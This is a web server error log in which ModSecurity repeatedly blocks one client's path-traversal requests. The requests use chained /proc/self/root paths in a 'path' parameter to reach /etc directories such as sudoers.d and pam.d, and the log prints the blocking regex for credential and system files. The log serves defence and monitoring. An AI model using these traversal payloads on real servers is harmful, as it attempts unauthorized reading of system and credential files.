[Fri Mar 20 03:04:09.654711 2026] [:error] [pid 7235:tid 140411716749056] [client 74.7.241.31:47166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjWfqxLDW4GITHUkSsDwAAAQM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:10.809829 2026] [:error] [pid 7235:tid 140411741927168] [client 74.7.241.31:47166] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjWvqxLDW4GITHUkSsEQAAAQA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:13.103488 2026] [:error] [pid 26799:tid 140411649607424] [client 74.7.241.31:47178] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjXda6ubjKNq_cu4aYDAAAA0s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:16.356227 2026] [:error] [pid 8307:tid 140411708356352] [client 74.7.241.31:47192] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjYL-FhjpZGs9ba8qt1gAAAwQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:20.006786 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:43124] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjZPXLqtnMIWvjpaJhgAAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:23.021816 2026] [proxy_fcgi:error] [pid 7893:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:35912] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:04:26.595745 2026] [:error] [pid 7893:tid 140411666392832] [client 74.7.241.31:43136] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjahCii7xarUs8iHYtDQAAAgk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:04:29.560774 2026] [:error] [pid 30424:tid 140411548894976] [client 74.7.241.31:52250] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjbct36Dv4L1GW-s-hPgAAAZc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:04:38.133345 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:52256] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjdvXLqtnMIWvjpaJhmQAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:04:40.197939 2026] [mime_magic:error] [pid 7893:tid 140411590858496] (70014)End of file found: [client 57.141.18.35:42892] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:04:44.947481 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.241.31:55244] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjfOoXxyEfFpUF8f9NcgAAAVQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:04:53.030976 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.241.31:49170] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjhfqxLDW4GITHUkSsNQAAARg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:04:53.157803 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:36924] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:04:58.935977 2026] [:error] [pid 31215:tid 140411616036608] [client 74.7.241.31:38870] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjigF0L0L-SsrnPo4xkwAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:05:05.975344 2026] [:error] [pid 15826:tid 140411666392832] [client 74.7.241.31:38876] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjkeoXxyEfFpUF8f9NfgAAAUk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:05:13.807094 2026] [:error] [pid 21219:tid 140411649607424] [client 74.7.241.31:54584] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjmPXLqtnMIWvjpaJhxwAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:05:18.811620 2026] [:error] [pid 17887:tid 140411716749056] [client 74.7.241.31:40024] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjngkwaGbbGflqUZAODQAAAMM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:05:29.127899 2026] [proxy_fcgi:error] [pid 7893:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:38136] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:05:35.308635 2026] [:error] [pid 30424:tid 140411674785536] [client 74.7.241.31:40036] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjr8t36Dv4L1GW-s-hcgAAAYg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:05:46.950528 2026] [:error] [pid 21219:tid 140411683178240] [client 74.7.241.31:34796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/skel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzjuvXLqtnMIWvjpaJh-gAAAoc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:06:00.185796 2026] [proxy_fcgi:error] [pid 21219:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:39292] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:06:12.274300 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:34796] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzj1PXLqtnMIWvjpaJiJQAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:06:27.178441 2026] [:error] [pid 21219:tid 140411624429312] [client 74.7.241.31:43596] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzj4_XLqtnMIWvjpaJiNwAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Fri Mar 20 03:06:29.175019 2026] [proxy_fcgi:error] [pid 8307:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:40384] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:06:39.038115 2026] [mime_magic:error] [pid 8307:tid 140411683178240] (70014)End of file found: [client 57.141.18.119:47024] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Fri Mar 20 03:06:39.934420 2026] [:error] [pid 26799:tid 140411582465792] [client 74.7.241.31:45428] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzj79a6ubjKNq_cu4aYcwAAA1M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:06:51.727196 2026] [:error] [pid 26799:tid 140411548894976] [client 74.7.241.31:56778] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzj-9a6ubjKNq_cu4aYegAAA1c"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 03:06:55.133829 2026] [proxy_fcgi:error] [pid 26799:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:41370] AH01075: Error dispatching request to : (polling)
[Fri Mar 20 03:06:59.758797 2026] [:error] [pid 30077:tid 140411607643904] [client 74.7.241.31:46350] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abzkA_u8EFLIOrSqIpvolAAAAlA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
